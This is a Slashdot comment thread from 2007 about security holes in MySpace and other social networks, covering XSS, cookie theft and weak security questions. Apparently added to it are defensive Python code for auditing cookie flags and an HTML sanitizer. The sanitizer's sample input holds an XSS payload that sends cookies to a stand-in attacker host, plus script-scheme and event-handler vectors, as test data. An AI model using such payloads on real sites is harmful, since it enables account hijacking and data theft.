
Social Networking Sites Full of Security Holes

CmdrTaco posted more than 7 years ago | from the 2.0-is-harder-than-1.0 dept.

Security 76

athloi writes "Social networking Web sites such as MySpace.com are increasingly juicy targets for computer hackers, who are demonstrating a pair of vulnerabilities they claim expose sensitive personal information and could be exploited by online criminals."

76 comments

Hey...Wait a minute (5, Funny)

UncleWilly (1128141) | more than 7 years ago | (#20132477)

First a story about how restrictive social networking sites are.

Now, so many holes in social networking sites your data is already in the hands of criminals.

Re:Hey...Wait a minute (4, Funny)

NeoTerra (986979) | more than 7 years ago | (#20132501)

It's VERY Restrictive Swiss Cheese. Kinda like Windows ME.

"It's Time for Social Networks to Open Up" (4, Funny)

Jeremiah Cornelius (137) | more than 7 years ago | (#20132565)

I laughed at this juxtaposition, too!

Hey, site vulnerabilities are an API! Right?

XSS is Web 3.0. ;-)

TAG THIS STORY, "sevenpasswords" PLEASE! (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20133237)

TAG THIS STORY, "sevenpasswords" PLEASE!

Re:"It's Time for Social Networks to Open Up" (1)

Virgil Tibbs (999791) | more than 7 years ago | (#20137157)

vulnerabilities are an API! Right?
Certainly so on the iphone

Re:Hey...Wait a minute (1)

FlatLine84 (1084689) | more than 7 years ago | (#20132509)

Anytime you put any kind of personal information on the web, pretty much anyone can see it. Hell, even Bob the hermit can have his identity stolen, and the poor guy hasn't even interacted with people in his life.

Re:Hey...Wait a minute (1)

pytheron (443963) | more than 7 years ago | (#20132579)

Indeed. Even if you are a tramp wandering the streets [telegraph.co.uk], you are not safe from the invasive internet scourge!

Re:Hey...Wait a minute (1)

DaedalusHKX (660194) | more than 7 years ago | (#20134979)

Actually there are sites that will say you "live" in places where you may have purchased services or subscriptions for friends. Several of these have me living in towns where I've never actually set foot. I have set up services for friends of mine there... used my name as the subscriber... and WHAM... suddenly these sites list me as a resident. The abuse of data for advertising and tracking purposes is ridiculous, but until people start saying "NO", nothing will occur... for example feed the system bad info, do what you can to monkeywrench it, because the harder it is to track innocents, the sooner this nonsense will fall apart.

Networking sites are "free lobbying" for the "tracka'person" culture of "actionable intelligence gathering", which basically means that it's crap, but it might serve some purpose later.

Re:Hey...Wait a minute (0, Flamebait)

utopianfiat (774016) | more than 7 years ago | (#20132539)

Heh. I'm sure those online predators are certain of how many "holes" there are in social networking sites.

Presidential Executive Order 434547621 (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20132711)


All your credit card are belong to us.

Losers.

Feloniously,
President George W. Bush [whitehouse.org]

Re:Hey...Wait a minute (4, Informative)

SatanicPuppy (611928) | more than 7 years ago | (#20133319)

Hey, you gotta give 'em credit for a quick turnaround on the openness issue...Only took 'em three hours (according to story submission time) to go from closed to too open.

In the end it's hardly surprising. These sites aren't designed with security in mind, and they allow user code on the pages. Game over man, game over. Blah blah blah SSL, blah blah blah strong passwords, blah blah blah restrict user code...This stuff is all basic.

Re:Hey...Wait a minute (1)

mdwh2 (535323) | more than 7 years ago | (#20141003)

Once again - the article was about open standards, not making data publicly available. Or don't you ever mention anything personal in email?

Re:Hey...Wait a minute (1)

gravis777 (123605) | more than 7 years ago | (#20135155)

I know the feeling, I felt like I was experiencing Deja Vu. I almost glanced over the post.

My God....It's full of holes! (5, Funny)

dave-tx (684169) | more than 7 years ago | (#20132495)

Of course it's full of holes. How else would it connect to the series of tubes?

Re:My God....It's full of holes! (1)

obergfellja (947995) | more than 7 years ago | (#20132785)

when the masses flock to a location, they leave behind a big hole that they were trying to fit through... oh wait, we are talking about software? well, that will work too.

Re:My God....It's full of holes! (4, Funny)

whopub (1100981) | more than 7 years ago | (#20133175)

Of course it's full of holes.
They probably meant assholes. That would make more sense.

MySpace (0)

Anonymous Coward | more than 7 years ago | (#20132497)

So, let me get this straight... when you said MySpace, you really meant...

I'd say the real threat isn't holes, but ho's (5, Insightful)

elrous0 (869638) | more than 7 years ago | (#20132533)

It wasn't a security hole that allowed someone to blackmail Miss New Jersey [gawker.com]. The real danger of these networking sites are dumbasses who post embarrassing pictures and blogs about themselves IN THE OPEN, not anything a hacker needs to dig for.

Re:I'd say the real threat isn't holes, but ho's (3, Insightful)

Spy der Mann (805235) | more than 7 years ago | (#20132963)

Yes, but assume that some sites DO implement security features like only allowing your data to be shown to your "buddies". What happens when these security measures get broken?

The other day I could watch a demonstration of an XSS attack on meebo due to lack of server-side validation.

Now add a little AI / data mining to this:

(New entry, mo/day/yr) "Here's a picture of me and my daughter Jessica playing on the NN. park" -> AI -> name: Jessica. Picture: (insert here). Last seen on: MMDDYY. Location: NN. Park.

There! You could make a database of potential victims for threats, blackmailing, and what not. The only thing that makes me feel safe is that such AI data mining technology hasn't been developed... yet.

As a rule of thumb, follow Murphy's law: What can go wrong, WILL go wrong (remember the recent SSN leaks?) Unless social networking sites have been PUBLICLY certified as having greater security than Fort Knox, stay away.

Re:I'd say the real threat isn't holes, but ho's (0)

Anonymous Coward | more than 7 years ago | (#20140723)

The only thing that makes me feel safe is that such AI data mining technology hasn't been developed... yet.

Echelon.

Tag this sevenpasswords please. (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#20132535)

Tag this sevenpasswords please.

No!!! (-1, Troll)

Jethro (14165) | more than 7 years ago | (#20132537)

Hang on, hang on... let me call upon my YEARS of acting experience to put on my fake-surprised face.

Hang on... let me get into character... just a second...

THERE! That look realistically surprised to you guys?

Re:No!!! (1)

myowntrueself (607117) | more than 7 years ago | (#20134607)

THERE! That look realistically surprised to you guys?

Nah, you look more like you did in that faked YouTube video where you had a pineapple shoved up your butt.

At least I'm *assuming* it was faked...

Re:No!!! (1)

Jethro (14165) | more than 7 years ago | (#20134769)

That wasn't me. My YouTube videos involve rocket engines shoved up My Little Pony butts.

Perhaps ran into one of these (1, Interesting)

JimboFBX (1097277) | more than 7 years ago | (#20132541)

My girlfriend's MySpace page became hijacked fairly recently and was forced to post advertisements for some website. Needless to say, she knows better than to give out her username and password to any website. I also called up namecheap.com, the domain provider and complained about the website that was being advertised. Nothing will probably be done, and how this happened will probably remain a mystery. I've always wondered if myspace actually uses a challenge token to log in, and if all it takes is a replay attack to log in.

Re:Perhaps ran into one of these (3, Informative)

SatanicPuppy (611928) | more than 7 years ago | (#20133415)

It's almost always cookie cloning or password theft...That's the devil deal with JavaScript, and allowing people to put their own widgets on their pages. Set up some XSS stuff [wikipedia.org], or just make a shiny widget and put it on your page and use it to snag cookie info.

Not much you can do about it other than turn off JavaScript by default. It's pretty annoying actually...These vulnerabilities have been known forever, but patching them would break a lot of code, so they stay open.

Re:Perhaps ran into one of these (2, Insightful)

HeavyDevelopment (1117531) | more than 7 years ago | (#20133925)

Yes turning off Javascript pretty much invalidates the whole Web 2.0 experience doesn't it? But on the other hand, you open yourself to a bunch of security issues if you don't. Quite the little conundrum....

Re:Perhaps ran into one of these (1)

GregNorc (801858) | more than 7 years ago | (#20136561)

Try NoScript. It's a Firefox extension that allows you to whitelist sites that you want allowed to use JavaScript. Any JavaScript from sites not in the whitelist is denied by default.

Re:Perhaps ran into one of these (1)

Scrameustache (459504) | more than 7 years ago | (#20135227)

Not much you can do about it other than turn off JavaScript by default.
Well, there's NoScript [noscript.net] to let you whitelist on the fly.

Main Problem With NoScript... (0)

Anonymous Coward | more than 7 years ago | (#20136093)

Well, there's NoScript to let you whitelist on the fly.

  • About NoScript...
  • Options...
  • ---
  • Untrusted >
  • ---
  • Allow exploitmyshinymetalass.com
  • Temporarily allow exploitmyshinymetalass.com

Re:Perhaps ran into one of these (1)

DrSkwid (118965) | more than 7 years ago | (#20140205)

The widespread use of HttpOnly cookies is coming upon us

http://msdn2.microsoft.com/en-us/library/ms533046.aspx [microsoft.com]

http://www.petefreitag.com/item/644.cfm [petefreitag.com]

of course, new rushed-in features open nice juicy vectors:
http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/ [ckers.org]
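The two threads above (SatanicPuppy's point that a hostile widget on a profile page can read the session cookie from script, and DrSkwid's point that the HttpOnly flag is the server-side answer) come down to one check a defender can automate: does every Set-Cookie header the login response emits carry HttpOnly and Secure? The following is an added example, not code from any commenter or from MySpace; the response headers and the name hints used to rank cookies are constructed for the example. It audits a set of headers, ranks the findings, and shows the hardened form of a weak header. As the linked ha.ckers post notes, HttpOnly only blocks document.cookie; it is a layer on top of fixing the injection itself, not a replacement for it.

```python
"""Audit Set-Cookie headers for the flags that limit cookie theft by injected script."""
import re

# Constructed heuristic: cookie names containing these fragments are treated as
# session/auth cookies, so missing flags on them are ranked "high".
SESSION_NAME_HINTS = ("sess", "auth", "token", "login")

# Constructed sample of a login response, not real MySpace headers.
SAMPLE_RESPONSE_HEADERS = [
    "Set-Cookie: sessionid=abc123; Path=/",
    "Set-Cookie: theme=dark; Path=/; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
    "Set-Cookie: auth=tok; Path=/; Secure; HttpOnly",
    "Content-Type: text/html",
]

_PREFIX = re.compile(r"^\s*set-cookie\s*:\s*", re.I)


def parse_set_cookie(header):
    """Split a Set-Cookie header (with or without the 'Set-Cookie:' prefix)
    into (name, value, {attribute_lowercase: value_or_True})."""
    body = _PREFIX.sub("", header)
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def missing_flags(header):
    """Return (cookie_name, [flags absent from the header])."""
    name, _, attrs = parse_set_cookie(header)
    missing = [flag for flag in ("Secure", "HttpOnly") if flag.lower() not in attrs]
    return name, missing


def audit_response(headers):
    """Return {cookie_name: (severity, [missing flags])} for every Set-Cookie
    header that lacks a flag; cookies that already carry both are omitted."""
    report = {}
    for header in headers:
        if not _PREFIX.match(header):
            continue  # not a Set-Cookie header
        name, missing = missing_flags(header)
        if not missing:
            continue
        looks_like_session = any(hint in name.lower() for hint in SESSION_NAME_HINTS)
        report[name] = ("high" if looks_like_session else "low", missing)
    return report


def harden_set_cookie(header):
    """Return the header with any missing Secure/HttpOnly attribute appended."""
    body = _PREFIX.sub("", header).strip().rstrip(";")
    _, missing = missing_flags(header)
    return body + "".join(f"; {flag}" for flag in missing)


if __name__ == "__main__":
    for name, (severity, missing) in audit_response(SAMPLE_RESPONSE_HEADERS).items():
        print(f"{severity:4} {name}: missing {', '.join(missing)}")
    print(harden_set_cookie("sessionid=abc123; Path=/"))
```

The severity ranking is only a name heuristic; a real audit would know which cookie carries the session from the application's configuration rather than guessing from its name.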

Social wants to be free. (0)

Anonymous Coward | more than 7 years ago | (#20132543)

Sounds like a good reason to join all of them together.

Well (-1, Troll)

Anonymous Coward | more than 7 years ago | (#20132555)

Only fuckwads and assholes have myspace accounts so they deserve the anal reaming hackers are going to give them. People who post personal info on such sites are complete idiots. Bottom line, they deserve what is coming to them.

Applause (1, Funny)

Anonymous Coward | more than 7 years ago | (#20132595)

I, for one, applaud these social networking sites' quick response to the call to "open up".

In other news... (0)

Anonymous Coward | more than 7 years ago | (#20132603)

Water is wet, the Pope shits in the woods, etc.

Whew! I'm Glad I'm a 15-year-old girl! (4, Funny)

filesiteguy (695431) | more than 7 years ago | (#20132623)

Fortunately, I'm only logged into those sites as a 15-year-old girl from Kansas with a dog named Toto.

At least I don't think they can get to me!

Re:Whew! I'm Glad I'm a 15-year-old girl! (5, Funny)

eln (21727) | more than 7 years ago | (#20133081)

Oh, they'll get to you.

And your little dog, too.

don't worry (1, Funny)

Anonymous Coward | more than 7 years ago | (#20134277)

I've got a bucket of water you can use, dual-purpose, works on servers and witches.

Re:Whew! I'm Glad I'm a 15-year-old girl! (0)

Anonymous Coward | more than 7 years ago | (#20137205)

Funniest one this year. Need a +10 funny.

Re:Whew! I'm Glad I'm a 15-year-old girl! (1)

Chineseyes (691744) | more than 7 years ago | (#20134747)

Since when did you start visiting slashdot Chris Hansen?

Re:Whew! I'm Glad I'm a 15-year-old girl! (0)

Anonymous Coward | more than 7 years ago | (#20137923)

14/f/cali here, let's have sex

A Net is a Bunch of Holes Sewn Together (3, Insightful)

Doc Ruby (173196) | more than 7 years ago | (#20132747)

Is giving your personal data to a company that sells it to spammers or anyone else with a buck when they start going bankrupt a "security hole"?

i wouldn't be surprised (5, Insightful)

sleekware (1109351) | more than 7 years ago | (#20132779)

I wouldn't be surprised to find out that most of the hacked accounts had passwords that were something that was listed under the favorite things on a user's profile.

Re:i wouldn't be surprised (2, Insightful)

Catil (1063380) | more than 7 years ago | (#20133333)

There is another possible "attack-vector" - most email accounts still offer or even require a security question like "what is my pet's name?"
Some of these can probably be answered by anyone reading the profile or blog of someone else; and once you've got access to the email account, you could use the forgot-password option on almost all other websites, including eBay and PayPal.

Re:i wouldn't be surprised (1)

Ciarang (967337) | more than 7 years ago | (#20134417)

I would like to think that nobody here is stupid enough to give the real answers to those kind of questions. The others will have the pet's name as their password anyway, so it's irrelevant.

Re:i wouldn't be surprised (1)

mh1997 (1065630) | more than 7 years ago | (#20136299)

I would like to think that nobody here is stupid enough to give the real answers to those kind of questions. The others will have the pet's name as their password anyway, so it's irrelevant.
I went to the Paris Hilton School of IT Security and the answer to all my questions is "tinkerbell."

I know, and they keep sending me Friend requests (3, Funny)

BobMcD (601576) | more than 7 years ago | (#20132791)


Oh, wait a second, you said 'Holes'. Oh. Carry on, then...

The Humanity! (1)

Klickoris (1104419) | more than 7 years ago | (#20132833)

12 year olds everywhere will be in a riot after they hear about this.

Re:The Humanity! (0)

Anonymous Coward | more than 7 years ago | (#20134935)

Oh, look! Another teenager finds his way to Slashdot and signs up for an account... aren't we blessed?

Security Holes? (1, Funny)

Anonymous Coward | more than 7 years ago | (#20132847)

I thought it said "Social Networking Sites Full of Assholes".

perverts? (2, Funny)

ZOMFF (1011277) | more than 7 years ago | (#20132903)

So how long till the "exploiting of the holes" gets taken out of context by parents and we're doomed to another discussion of "think of the children" and "sexual predators in the tubes".

No shit, Sherlock! (0)

Anonymous Coward | more than 7 years ago | (#20132921)

How the hell do the decision makers even get jobs? Who on earth thought letting users customise HTML et al would be a good idea?

No SSL (3, Insightful)

jerbenn (903795) | more than 7 years ago | (#20132957)

How can anyone expect to keep their myspace login credentials private when they don't even have the login page SSL'd? Those bunch of retards!

'increasingly juicy targets' (1)

amrust (686727) | more than 7 years ago | (#20132987)

I'm guessing if you're searching MySpace for "juicy", then YES... you'll probably see more than a few 'security holes'. That's just the risk you take, as a user of The_Internet.

/haven't tried, myself

Stereotyping? (4, Insightful)

Andy Dodd (701) | more than 7 years ago | (#20133189)

"Yet another MySpace security hole" somehow translates to "All social networking sites are full of holes"?

Just a LITTLE bit of stereotyping in the article title I think?

Re:Stereotyping? (1)

ad0gg (594412) | more than 7 years ago | (#20135693)

Per the article, it wasn't a hole on the site. It was a hole in older versions of Firefox.

Holes?!?!?!?! (0)

Anonymous Coward | more than 7 years ago | (#20133207)

Giggity Giggity Giggity.

They really don't care about the end user... (2, Insightful)

DeVil.DeMonde (1128775) | more than 7 years ago | (#20133213)

What I find funny is the fact that most of the poor souls that go to such sites looking to connect with other people are on a site where the people in charge couldn't care less... I signed up for My(waste of)Space when it showed up on the net because for some people I knew it was the only means to reach them any longer. I canceled my ISP and switched since then, asking the Oz-like people running the show to please update my e-mail to reflect this change; more than a year has gone by. Has my e-mail been changed? Nope. Do I waste my time on MySpace anymore? Nope.

When you refuse to acknowledge the community you "support" sub-par quality is what you must expect. Now if those MySpace people want to reach me they have to track me down via other means. To limit yourself to one medium of communication is sad anyway. Pidgin for everybody.

Re:They really don't care about the end user... (0)

Anonymous Coward | more than 7 years ago | (#20133837)

Waste of time is right...don't be a pawn in their eyeballs-for-ad-dollars marketing schemes. Ultimately, they don't care about their users, they care about the eyeballs of the users and the advertisers who buy ads. Besides, who would want to make it easier for anybody and their brother to track their movements throughout their daily lives? There are absolutely people out there that will abuse that information, so don't go to extra trouble to make it easier for them to find it...be unknown and anonymous (unless you plan to get into politics); it's much safer that way.

Re:They really don't care about the end user... (1)

rainmayun (842754) | more than 7 years ago | (#20134687)

To play devil's advocate, how could they reasonably have differentiated you from a malicious user intent on subverting someone else's account?

Re:They really don't care about the end user... (1)

DeVil.DeMonde (1128775) | more than 7 years ago | (#20134925)

To play devil's advocate, how could they reasonably have differentiated you from a malicious user intent on subverting someone else's account?
Erm, since I was actually logged into the account and provided everything they had asked for it might have been grounds for them to approve such a request, thereby proving my identity... But then again you are right, from the eyes of the truly security conscious there is no way. Be sure I won't be e-mailing or faxing anybody a copy of my ID anytime soon, let alone divulging personal information on the internet to anybody in the name of security or not. Disturbing: in the digiworld there is no real way for you to prove you are you, or I am me, without giving up potentially harmful personal information. A thumb print scanner for identification verification to log onto sites would be really impractical (though neat). Maybe I'm not me, maybe I'm you pretending to be me, or me pretending to be you pretending to be me. *Begins to observe the entity he thinks he might be start to have a serious identity crisis.* I think therefore I am, but I mean who am I anyway, who is anybody...? I need my tinfoil hat...

Full of holes? No problem... (5, Funny)

veganboyjosh (896761) | more than 7 years ago | (#20133499)

This error has been sent to myspace.com's technical department.

I'm sure Tom will get right on it.

Re:Full of holes? No problem... (1)

kaizokuace (1082079) | more than 7 years ago | (#20137243)

oh that rascally Tom!

A patch has been issued (1, Funny)

Anonymous Coward | more than 7 years ago | (#20133653)

Get the end users to install curtains and a dog.

Myspace hole that's funny (2, Informative)

British (51765) | more than 7 years ago | (#20133727)

There's a feature where in MySpace you can set all your pictures to "private". But most idiots on MySpace insist on having a MySpace slide show on their profile page (along with 2000 other Flash applets). Click on the picture in the slideshow, now you can see the album! Just use previous/next to navigate through them.

Then there was the time I was on myspace, and a banner ad tried to send me a virus. You would think Myspace would be a bit more discretionary who it lets send banners over. Tsk tsk!

Of course, not as fun as the images directory being left open on all Angelfire pages. Some of those were fun to sort through, showing pictures not intended for the public (i.e. nudity, etc).

Spam Databases (0)

Anonymous Coward | more than 7 years ago | (#20133785)

Sod the whole identity theft aspect. Just think of the potential in these databases for spam. A list of names+email complete with links of who knows who.

Suddenly spam is coming from your (spoofed) best friend's email, with their name and yours in it: "Hey man, I just bought one of these and it's awesome"

Email would become a nearly unusable thing for these people.

News? (1)

Geekbot (641878) | more than 7 years ago | (#20133939)

More like olds. This is like complaining that geocities is full of hacks.

But Celebrities are doing it... (1)

starwarsfans (921179) | more than 7 years ago | (#20134161)

...Therefore, it must be a safe and smart thing to do. My Manager suggested I create a MySpace account to market myself to a broader audience. Buzz!!! Wrong answer, idiot!

I wouldn't call it a security flaw (1)

corifornia (995298) | more than 7 years ago | (#20134323)

Not that I give two rats' dicks about MySpace, but if you read the article the flaw only works in Firefux and requires the end user to click a link. It's pretty hard to patch holes when it's an ID-10T flaw in one of your users. Oh, and the guy in the picture has a crappy hair cut; he looks like he's interested in finding a lot 'tighter' holes than the ones that he's found, probably on an 11-year-old (gender open).

user-submitted HTML content bad (2, Insightful)

rainmayun (842754) | more than 7 years ago | (#20134399)

Well of course they are. Any site that allows random users to post HTML content that then gets embedded in the site's pages (especially as extensively as sites like Myspace, etc allow it) is going to be subject to security flaws. Moral of the story: browse such sites using a secure browser, at least as secure a browser as you can find.
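The comment above describes the root cause behind the cookie-theft and widget discussion earlier in the thread: markup from one user is embedded verbatim in pages served to every other user. The standard server-side mitigation is to parse the submitted HTML and rebuild it from an allowlist of tags and attributes, dropping script, event handlers and script-scheme links. The following is an added example, not code from the commenter or from any site discussed here; the allowlist is constructed (loosely modelled on the small tag subset Slashdot itself accepts for comments) and the sample input is made up for the demonstration. The parser returns both the cleaned markup and a list of what it removed, which is the signal a site would want to log.

```python
"""Allowlist HTML sanitizer built on the standard-library HTMLParser.

Anything not on the allowlist is removed; <script>/<style> lose their
contents as well, since that text would otherwise be rendered as data.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: tags and per-tag attributes that are kept.
ALLOWED_TAGS = {"b", "i", "p", "br", "a", "ol", "ul", "li", "em", "strong", "tt", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}                       # never pushed on the open-tag stack
SAFE_SCHEMES = {"http", "https", "mailto"}
CONTAINER_DROP = {"script", "style"}     # dropped together with their contents


def _safe_href(value):
    """Return the href if its scheme is allowed (or relative), else None."""
    value = value.strip()
    scheme = urlparse(value).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return None
    return value


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # output fragments
        self.open_tags = []  # stack used to emit balanced closing tags
        self.dropped = []    # audit trail of removed tags/attributes
        self.skip_depth = 0  # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            return
        if tag in CONTAINER_DROP:
            self.skip_depth += 1
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"{tag}@{name}")   # e.g. onclick, onerror
                continue
            if name == "href":
                value = _safe_href(value or "")
                if value is None:
                    self.dropped.append("a@href(unsafe scheme)")
                    continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in CONTAINER_DROP:
                self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close everything opened after it so the output stays well-formed.
            while self.open_tags:
                top = self.open_tags.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))  # re-escape text nodes

    def result(self):
        while self.open_tags:
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize(html):
    """Return (clean_html, dropped_items) for user-submitted markup."""
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return parser.result(), parser.dropped


if __name__ == "__main__":
    # Constructed profile snippet containing the patterns the thread discusses.
    sample = ('<b>hi</b><script>document.location="http://evil.example/?"+document.cookie</script>'
              '<a href="javascript:alert(1)" onclick="x()">link</a><img src=x onerror=steal()>')
    clean, dropped = sanitize(sample)
    print(clean)
    print("dropped:", dropped)
```

Because the output is rebuilt from the parse tree rather than filtered with regular expressions, malformed or unclosed input still produces balanced markup, and the `dropped` list gives the site a per-submission record of stripped script and event handlers that can feed abuse monitoring.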


That's not nice to the girls. (1)

kinglink (195330) | more than 7 years ago | (#20134657)

Seriously I know they aren't exactly the most prudish, but calling them holes is just crude.

Oh we're talking about security? My bad.

Try Deleting Your Facebook Account (2, Informative)

kellyb9 (954229) | more than 7 years ago | (#20135183)

I recall reading a story recently regarding this issue. From a girl's Facebook account, researchers had enough information to steal her identity in 15 minutes. On a side note: I am not able to delete my Facebook account. To fully delete it, I have to remove everything from my wall and every friend I've ever had. Don't really want to do that. I can "disable" it. Personally, I would just like to be removed from their database. No seriously - I sent them the SQL statement that would probably take care of it. I fully detest Facebook.

Stop the presses! (1)

Groggnrath (1089073) | more than 7 years ago | (#20136443)

A site where you put in your name, age, and location, for the sole purpose of meeting people is unsecured?

What sort of fiend would prey on people who clearly state their name, address, age, and often occupation, hangouts, favorite things?

I mean really, how much security did you expect? There is no anonymity on MySpace or Flickr, so who the hell would be surprised when it gets hacked. There are probably a million people out there that hate MySpace (or Flickr/other social sites); some of them must have the desire to program with malicious intent. It's a big fat whale carcass just waiting for the sharks to arrive.

MySpace is the boogeyman (1)

Ayeffkay (1139265) | more than 7 years ago | (#20138157)

I work at a computer repair shop, and every single day I hear some variation of "as soon as you log in to MySpace you open a port in your firewall and that's why you have a virus." I've been asked before to block MySpace on customers' systems. My boss has complained that the store's computer has errors because someone logged on to MySpace (it has nothing to do with the 500+GB of customer backups on the system, because they're not on the same hard drive as Windows).

And now you go and post this? Despite the headline having no real basis in the article, and that the context implies that this exploit is not in the wild yet, it's going to be used to justify every past and future accusation.

If I'm lucky, my employers will only knee-jerk at the headline. If not, they'll read the entire article, knee-jerk at the headline anyway, and based on the statement, "it only affects older versions of the Firefox Web browser and does not affect Internet Explorer," argue that IE is superior in every way to Firefox. Just watch.

Thanks a lot, /.

Re:MySpace is the boogeyman (0)

Anonymous Coward | more than 7 years ago | (#20139821)

STFU, whiner.